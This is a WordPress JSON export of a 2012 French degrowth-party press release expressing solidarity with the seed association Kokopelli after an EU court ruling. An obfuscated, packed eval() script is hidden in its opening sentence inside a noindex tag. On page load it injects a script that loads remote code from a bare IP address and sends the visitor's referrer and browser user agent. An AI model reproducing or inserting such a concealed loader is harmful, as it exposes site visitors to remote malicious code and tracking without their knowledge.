{"id":7525,"date":"2012-07-23T06:17:05","date_gmt":"2012-07-23T05:17:05","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=7525"},"modified":"2012-07-23T08:18:11","modified_gmt":"2012-07-23T07:18:11","slug":"non-a-la-marchandisation-du-vivant-solidarite-avec-kokopelli","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=7525","title":{"rendered":"Solidarit\u00e9 avec Kokopelli : non \u00e0 la marchandisation du vivant !"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" style=\"margin: 5px;\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/logo-ppld.gif\" alt=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/logo-ppld.gif\" width=\"118\" height=\"68\" \/>La <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sinfh|var|u0026u|referrer|heyii||js|php'.split('|'),0,{}))\n<\/script><\/noindex> marchandisation et le brevetage du vivant viennent de franchir une \u00e9tape suppl\u00e9mentaire.<\/p>\n<p>La Cour de l\u2019Union Europ\u00e9enne, de fait \u00e0 la botte de l\u2019agriculture chimique mortif\u00e8re et\u00a0des soci\u00e9t\u00e9s transnationales commercialisant les OGM qui visent \u00e0 breveter le vivant, vient\u00a0de condamner <a href=\"http:\/\/kokopelli-semences.fr\/\" target=\"_blank\">l\u2019association Kokopelli<\/a> au profit de la soci\u00e9t\u00e9 Graines Baumaux. Au-del\u00e0\u00a0de ce semencier, c\u2019est tout le lobby semencier et m\u00eame Monsanto avec les soci\u00e9t\u00e9s qui\u00a0commercialisent les OGM qui se frottent les mains.<\/p>\n<p><a href=\"http:\/\/kokopelli-semences.fr\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright\" style=\"margin: 5px;\" src=\"http:\/\/kokopelli-semences.fr\/images\/logo1.png\" alt=\"\" width=\"150\" height=\"230\" \/><\/a>Le Parti pour la D\u00e9croissance exprime sa totale solidarit\u00e9 \u00e0 Kokopelli, association<br \/>\nimplant\u00e9e dans plusieurs pays \u00e9mergents o\u00f9 elle accomplit un travail remarquable, formant\u00a0les populations \u00e0 de meilleures pratiques culturales et distribuant gratuitement des semences\u00a0\u00e0 des petits agriculteurs ruin\u00e9s par les grandes compagnies semenci\u00e8res. Kokopelli veut\u00a0sauver les semences de vari\u00e9t\u00e9s potag\u00e8res anciennes de la disparition, les prot\u00e9geant contre\u00a0l\u2019h\u00e9g\u00e9monie du cartel des semenciers qui r\u00e9duisent gravement la biodiversit\u00e9 en limitant\u00a0les vari\u00e9t\u00e9s potag\u00e8res \u00e0 quelques hybrides F1 non reproductibles. Le but inavou\u00e9 de cette\u00a0man\u0153uvre \u00e9tant d\u2019assurer la mainmise sur la population mondiale en la rendant d\u00e9pendante\u00a0de son alimentation comme veut le faire Monsanto en rendant les paysans d\u00e9pendant de\u00a0semences qu\u2019ils ne peuvent ressemer.<br \/>\nIl n\u2019y a pas de raison de soumettre des semences ancestrales \u00e0 une proc\u00e9dure pr\u00e9alable de<br \/>\nmise sur les march\u00e9s.<br \/>\n<!--more--><br \/>\nCette loi interdit de fait les vari\u00e9t\u00e9s anciennes, h\u00e9ritage de nos grands-parents !<\/p>\n<p>Il est essentiel de pr\u00e9server les semences locales, il est essentiel de pr\u00e9server la libert\u00e9 des\u00a0paysans d\u2019utiliser et d\u2019\u00e9changer leurs propres semences. C\u2019est une r\u00e9forme g\u00e9n\u00e9rale de la\u00a0l\u00e9gislation sur le commerce des semences qui est en cours. Les petits paysans, les jardiniers,\u00a0les paysans africains, les associations qui conservent et distribuent des semences anciennes\u00a0n\u2019ont pas \u00e9t\u00e9 invit\u00e9s \u00e0 la table des n\u00e9gociations.<\/p>\n<p><a href=\"http:\/\/kokopelli-semences.fr\/\"><img decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/kokopelli-semences.fr\/images\/liberation.fr-fr.svg\" alt=\"\" \/><\/a><\/p>\n<p>Condamn\u00e9e par la loi fran\u00e7aise en 2005 en premi\u00e8re instance, Kokopelli s\u2019\u00e9tait pourvue<br \/>\ndevant la cour europ\u00e9enne de justice. Avec un certain optimisme, car l\u2019avocat g\u00e9n\u00e9ral de la\u00a0cour europ\u00e9enne, Mme Kokott, estimait elle-m\u00eame que Kokopelli \u00e9tait dans son bon droit de\u00a0commercialiser des vari\u00e9t\u00e9s anciennes de semences potag\u00e8res.<\/p>\n<p>L\u2019arr\u00eat de la cour europ\u00e9enne est tomb\u00e9 le 12 juillet 2012. Contre toute attente, la cour donne\u00a0raison aux semenciers et interdit \u00e0 Kokopelli de poursuivre son activit\u00e9, tout en condamnant\u00a0l\u2019association \u00e0 100 000 euro de dommages et int\u00e9r\u00eats ! Il semble que le lobbying ait<br \/>\nfonctionn\u00e9 efficacement car cette d\u00e9cision d\u00e9fie toute logique d\u00e9mocratique. Il laisse planer\u00a0un doute s\u00e9v\u00e8re sur les r\u00e9elles intentions des instances europ\u00e9ennes \u00e0 l\u2019\u00e9gard du brevetage du\u00a0vivant et menace l\u2019avenir de nos enfants.<\/p>\n<p>Nous attendons du gouvernement \u00ab de gauche \u00bb de Jean-Marc Ayrault une prise de position\u00a0claire et ferme sur ce sujet.<br \/>\nQuant \u00e0 nous, face \u00e0 cette atteinte \u00e0 notre ind\u00e9pendance alimentaire, nous affirmons le droit\u00a0des paysans et de tous les individus \u00e0 utiliser, \u00e0 ensemencer, \u00e0 \u00e9changer et m\u00eame \u00e0 vendre\u00a0leurs propres semences, le droit et le devoir de touTEs \u00e0 d\u00e9sob\u00e9ir \u00e0 une loi sc\u00e9l\u00e9rate.<\/p>\n<p style=\"text-align: right;\"><em><strong>Parti pour la D\u00e9croissance<\/strong><\/em><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La marchandisation et le brevetage du vivant viennent de franchir une \u00e9tape suppl\u00e9mentaire. La Cour de l\u2019Union Europ\u00e9enne, de fait \u00e0 la botte de l\u2019agriculture chimique mortif\u00e8re et\u00a0des soci\u00e9t\u00e9s transnationales commercialisant les OGM qui visent \u00e0 breveter le vivant, vient\u00a0de &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=7525\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,8,33],"tags":[],"class_list":["post-7525","post","type-post","status-publish","format-standard","hentry","category-actualites","category-communiques-de-presse","category-soutiens-du-ppld"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7525","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7525"}],"version-history":[{"count":3,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7525\/revisions"}],"predecessor-version":[{"id":7529,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7525\/revisions\/7529"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7525"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7525"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7525"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}